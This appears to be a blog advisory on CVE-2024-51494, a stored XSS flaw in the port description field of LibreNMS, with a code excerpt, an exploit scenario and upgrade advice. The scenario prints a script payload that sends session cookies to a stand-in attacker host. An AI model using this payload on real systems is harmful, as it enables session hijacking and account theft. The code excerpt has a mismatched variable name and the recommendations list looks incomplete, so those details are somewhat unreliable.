CVE-2024-51494: Stored XSS Vulnerability found in LibreNMS Port Settings Page

LibreNMS is a popular open-source network monitoring system that uses PHP, MySQL, and SNMP to gather and display various metrics related to the performance and health of devices on a network. It offers a user-friendly web interface with a wide range of features and is widely used by network administrators for keeping track of their infrastructure.

Recently, a Stored Cross-Site Scripting (XSS) vulnerability was discovered in the "Port Settings" page, which allows authenticated users to inject malicious JavaScript code through the "descr" parameter when editing a device's port settings. This vulnerability can compromise the user's session, allowing unauthorized actions to be performed without their knowledge.

This blog post will review the details of this vulnerability (CVE-2024-51494), how it can be exploited, and references to the original research and discoveries, including fixes implemented in version 24.10. of LibreNMS.

Vulnerability Details

The affected page is the Port Settings page in the LibreNMS web interface, which allows an authenticated user to edit various settings related to a device's network ports. A malicious user can exploit this vulnerability by injecting arbitrary JavaScript code via the "descr" parameter, which is used to store a user-supplied description of the port.

The injected code is stored in the database by the web application and is then rendered on the page whenever the Port Settings page is subsequently visited. Here's a code snippet of where the vulnerability occurs in the application:

// app/Http/Controllers/PortsController.php
public function update(Request $request, $deviceId, $portId)
{
    ...
    $port = Port::where('device_id', $t_device)
        ...
        ->update([
            ...
            'descr' => $request->get('descr'),
            ...
        ]);

}

Since the 'descr' parameter isn't properly sanitized, it allows for the injection of arbitrary JavaScript code, which can then be executed in the context of the user's browser.

Exploit Scenario

To exploit this vulnerability, an attacker needs to have access to a valid login credential for the LibreNMS web interface. This can be achieved through social engineering, password attacks, or other means.

Upon successful authentication, the attacker navigates to the "Port Settings" page of any device and enters the following malicious JavaScript code as the description for any available port:

<script>fetch('https://attacker.example.com/log?key='+encodeURIComponent(document.cookie));</script>

After saving the changes, the injected code will be stored in the database and executed whenever any user visits the Port Settings page. This malicious code sends the victim's session cookie to the attacker's server, which can then be used to hijack the victim's session.

Victims might unwittingly visit the Port Settings page due to routine work or by receiving a link via social engineering, at which point their sessions would be compromised and potentially lead to unauthorized actions being carried out by the attacker.

Fix and Recommendations

The vulnerability (CVE-2024-51494) has been fixed in LibreNMS version 24.10., which properly sanitizes the 'descr' parameter to prevent arbitrary JavaScript code injection. It is highly recommended for users to upgrade their LibreNMS installation to the latest version to mitigate this vulnerability.

- Original vulnerability report: LibreNMS GitHub Issue
- Fix commit: LibreNMS GitHub Commit

Regularly monitor logs for suspicious activity

By following these steps, you can help protect your network monitoring solution from potential exploitation and keep your infrastructure secure.

Timeline

Published on: 11/15/2024 16:15:37 UTC
Last modified on: 11/20/2024 14:40:56 UTC